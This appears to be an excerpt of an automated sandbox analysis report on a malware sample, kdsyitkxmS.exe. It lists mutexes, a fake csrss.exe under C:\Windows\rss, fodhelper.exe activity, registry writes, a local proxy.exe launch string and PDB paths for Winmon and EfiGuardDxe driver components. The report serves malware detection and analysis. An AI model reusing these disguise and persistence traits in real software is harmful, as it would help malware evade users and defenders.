        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8856:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4808:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8856:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3504:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9052:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8896:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9116:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8296:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1448:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2900:120:WilError_03
        Source: C:\Windows\rss\csrss.exeMutant created: \Sessions\1\BaseNamedObjects\Global\h48yorbq6rm87zot
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3504:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4164:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9052:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8312:120:WilError_03
        Source: csrss.exeString found in binary or memory: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: kdsyitkxmS.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
        Source: C:\Windows\System32\fodhelper.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities\UrlAssociations
        Source: C:\Windows\rss\csrss.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UninstallerJump to behavior
        Source: kdsyitkxmS.exeStatic file information: File size 4379008 > 1048576
        Source: kdsyitkxmS.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x40b400
        Source: kdsyitkxmS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: kdsyitkxmS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: kdsyitkxmS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: kdsyitkxmS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: kdsyitkxmS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: kdsyitkxmS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: kdsyitkxmS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: System.Data.pdb source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
        Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: symsrv.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004578000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
        Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Core.ni.pdb source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Numerics.ni.pdb source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
        Source: Binary string: System.Transactions.ni.pdbRSDSc source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
        Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Management.ni.pdbRSDSJ< source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: symsrv.pdbGCTL source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004578000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: EfiGuardDxe.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
        Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: dbghelp.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: dbghelp.pdbGCTL source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Loader.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: powershell.exe, 00000035.00000002.209085027998.000000006B5CD000.00000020.00000001.01000000.00000014.sdmp
        Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Data.ni.pdb source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
        Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Numerics.ni.pdbRSDSautg source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
        Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Unable to locate the .pdb file in this location source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
        Source: Binary string: The module signature does not match with .pdb signature. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: .pdb.dbg source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: '(EfiGuardDxe.pdbx source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: ZZC:\winirun92 cedojuhexoy.pdb source: kdsyitkxmS.exe, 00000004.00000001.208199622621.0000000000401000.00000020.00000001.01000000.00000004.sdmp, kdsyitkxmS.exe, 0000000A.00000001.208335995035.0000000000401000.00000020.00000001.01000000.00000004.sdmp, csrss.exe, 00000014.00000001.208684568909.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000017.00000001.208779570930.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000001F.00000001.208811296233.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000028.00000001.208833898384.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000002B.00000001.208860836082.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000032.00000001.208896227050.0000000000401000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: System.Management.pdb source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
        Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Data.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
        Source: Binary string: System.Management.ni.pdb source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: or you do not have access permission to the .pdb location. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Transactions.pdb source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
